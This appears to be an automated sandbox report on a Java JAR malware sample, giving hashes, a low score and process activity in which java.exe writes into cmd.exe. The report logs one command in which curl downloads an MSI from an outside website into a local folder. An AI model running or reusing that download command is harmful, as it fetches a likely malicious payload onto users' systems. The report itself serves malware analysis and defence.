6e301d812bda8318de116a19338a64642086a659833588420d4131fe7008adc8

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
25-04-2024 01:46

Target

2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371.jar
Size

47KB
MD5

7f75fe01e92534899449d5191d586045
SHA1

a26a267dac7dfc8b8feda0a190dc845ad4f6f0ca
SHA256

2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371
SHA512

9b240cdb3d6a00821ef03c749807a3eaea5c1b065f7f88f94c5904a64f94d276a31efefb0a301549744f67a42e3dd8389a6a1d057ff1fd09a942b1b3dd5925bf
SSDEEP

768:s2quUO5gEeRU+aD+QusAXK9wEglRozyt8VomdfeBTcdgknm2+N9Utl:s2RvWayh9owEREmYBgnm2+y

Score

1^/10

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

java.exe

description	pid	process	target process
PID 2080 wrote to memory of 2656	2080	java.exe	cmd.exe
PID 2080 wrote to memory of 2656	2080	java.exe	cmd.exe
PID 2080 wrote to memory of 2656	2080	java.exe	cmd.exe
PID 2080 wrote to memory of 2532	2080	java.exe	cmd.exe
PID 2080 wrote to memory of 2532	2080	java.exe	cmd.exe
PID 2080 wrote to memory of 2532	2080	java.exe	cmd.exe

C:\Windows\system32\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371.jar
1⤵
- Suspicious use of WriteProcessMemory
PID:2080

C:\Windows\system32\cmd.exe
cmd /c curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi
2⤵
PID:2656

memory/2080-6-0x0000000002620000-0x0000000005620000-memory.dmp

Filesize
48.0MB

Download
memory/2080-10-0x0000000000340000-0x0000000000341000-memory.dmp

Filesize
4KB

Download
memory/2080-12-0x0000000000340000-0x0000000000341000-memory.dmp

Filesize
4KB

Download